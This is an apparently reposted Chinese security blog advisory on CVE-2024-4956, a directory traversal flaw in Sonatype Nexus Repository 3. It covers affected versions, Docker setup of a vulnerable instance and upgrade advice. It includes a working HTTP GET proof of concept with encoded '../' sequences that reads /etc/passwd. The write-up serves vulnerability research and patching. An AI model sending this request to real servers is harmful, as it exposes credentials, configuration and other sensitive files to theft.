CVE-2024-4956:Nexus Repository 3目录穿越漏洞

admin 2024年11月14日13:13:18评论16 views字数 1134阅读3分46秒阅读模式

 

0x01 简介

Sonatype Nexus Repository 是美国Sonatype公司的一款存储库管理器,用于存储和分发软件组件、构建工件和 Docker 容器。它支持多种包格式,与 CI/CD 工具集成,并提供安全性和合规性功能。

0x02 漏洞概述

漏洞编号:CVE-2024-4956

Nexus Repository仅依赖Jetty自带的方法进行请求路径的安全检查,而未进行深入的验证,导致攻击者可以利用路径穿越攻击访问文件系统上的任意位置。

成功利用这一漏洞的攻击者可以读取Nexus Repository服务器上的任意文件,这可能包括配置文件、数据库备份以及其他敏感数据。此外,特定情况下如果攻击者能够进一步利用服务器上的其他配置或漏洞,可能会完全控制受影响的服务器。

0x03 影响版本

Sonatype Nexus Repository 3 < 3.68.1

0x04 环境搭建

任务调度中心【Docker方式构建】

1.拉取镜像
docker pull sonatype/nexus3:3.68.0

CVE-2024-4956:Nexus Repository 3目录穿越漏洞

2.持久化目录
mkdir -p /home/nexus/data
chmod 777 -R /home/nexus/data

3.查看镜像ID
docker images

CVE-2024-4956:Nexus Repository 3目录穿越漏洞4.创建nexus容器并启动

docker run -d --name nexus3 -p 8081:8081 --restart always -v /home/nexus/data:/nexus-data 镜像ID
CVE-2024-4956:Nexus Repository 3目录穿越漏洞

访问http://yourip:8081/

CVE-2024-4956:Nexus Repository 3目录穿越漏洞

0x05 漏洞复现

直接使用poc可读取到/etc/passwd:

CVE-2024-4956:Nexus Repository 3目录穿越漏洞

POC:

GET /%2F%2F%2F%2F%2F%2F%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1
Host: your-ip
Accept-Encoding: gzip, deflate, br
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.159 Safari/537.36
Connection: close

0x06 修复方式

目前官方已有可更新版本,建议受影响用户升级至最新版本。

官方文档:https://help.sonatype.com/repomanager3/download

 

原文始发于微信公众号(白帽子):CVE-2024-4956:Nexus Repository 3目录穿越漏洞

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年11月14日13:13:18
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   CVE-2024-4956:Nexus Repository 3目录穿越漏洞https://cn-sec.com/archives/3394802.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息